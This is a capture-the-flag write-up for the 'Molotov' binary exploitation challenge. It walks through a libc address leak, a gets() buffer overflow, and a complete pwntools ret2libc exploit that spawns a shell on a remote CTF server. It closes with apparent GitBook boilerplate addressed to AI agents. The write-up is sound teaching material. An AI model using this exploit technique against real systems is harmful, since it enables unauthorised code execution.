> For the complete documentation index, see [llms.txt](https://ir0nstone.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ir0nstone.gitbook.io/notes/writeups/ctfs/fword-ctf-2020/binary-exploitation/untitled.md).

# Molotov

## ‌Overview

Running the binary prints and hex value and prompts for input:

```
$ ./molotov
f7d9ef00
Input :
```

We can definitely cause it to segfault:

```
$ python3 -c 'print("A"*300)' | ./molotov
f7d61f00
Input : 
Segmentation fault
```

So let's work out what this value is and how we can use it.‌

## Decompilation <a href="#decompilation" id="decompilation"></a>

‌

We chuck the binary into GHidra and get a simple disassembly. `main` calls `vuln` and does almost nothing else. `vuln`, however, has *some* interesting stuff:

```c
int vuln(void){
    char buffer [24];
    
    printf("%x\n",system);
    puts("Input : ");
    
    gets(buffer);
    
    return 0;
}
```

‌

It prints the address of `system`! Awesome.‌

Let's run the binary on the remote serevr to leak the libc version.

```
$ nc 54.210.217.206 1240
f7d3c8b0
Input :
```

‌

So now we essentially have a libc leak, we head over to [find the libc version](https://libc.blukat.me/).

![There are 4 matches‌](https://gblobscdn.gitbook.com/assets%2F-MFC6wsr3fMfJKJtYtmn%2F-MG4TH0ZQ5tkG_qg_28t%2F-MG4_uje-dVyvfpG0wn5%2Fimage.png?alt=media\&token=fd4a0efa-27f3-47fc-8d8c-8de6e2eed2d3)

Annoyingly, there are 4 possible libc versions, and we can only get it from trial and error. Aside from the libc version itself, the exploit is quite simple - subtract the offset of `system` from the leaked address to get `libc` base, then use that to get the location of `/bin/sh`.

The correct libc version is `2.30-0ubuntu2.1_i386`.‌

## Exploitation <a href="#exploitation" id="exploitation"></a>

```python
from pwn import *

elf = context.binary = ELF('./molotov')

if args.REMOTE:
    libc = ELF('./libc-remote.so')
    p = remote('54.210.217.206', 1240)
else:
    libc = elf.libc
    p = process()

addr = int(p.recvline(), 16)
p.clean()

libc.address = addr - libc.sym['system']

rop = ROP(libc)
rop.raw('A' * 32)
rop.system(next(libc.search(b'/bin/sh\x00')))

p.sendline(rop.chain())
p.interactive()
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ir0nstone.gitbook.io/notes/writeups/ctfs/fword-ctf-2020/binary-exploitation/untitled.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.